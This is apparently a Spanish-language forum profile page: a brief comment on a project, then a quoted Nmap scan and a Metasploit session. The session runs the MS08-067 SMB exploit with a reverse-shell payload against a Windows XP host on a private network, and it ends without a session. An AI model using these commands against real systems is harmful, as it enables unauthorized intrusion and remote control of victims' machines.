muy buen proyecto... estaria bueno podes hacer un diagrama de flujo o un esquema para poder entender a grandes rasgos como funciona... creo q el objetivo es apreder.. Muy buen proyecto
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarStarting Nmap 5.00 ( http://nmap.org ) at 2010-02-21 23:21 ART
Interesting ports on 192.168.1.100:
Not shown: 996 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
2869/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 4.59 seconds
Citar
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 524 exploits - 246 auxiliary
+ -- --=[ 193 payloads - 23 encoders - 8 nops
=[ svn r8578 updated today (2010.02.21)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.100 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.1.102 yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target...
- Fingerprint: Windows XP Service Pack 3 - lang:Spanish
- Selected Target: Windows XP SP3 Spanish (NX)
- Triggering the vulnerability...
- Exploit completed, but no session was created.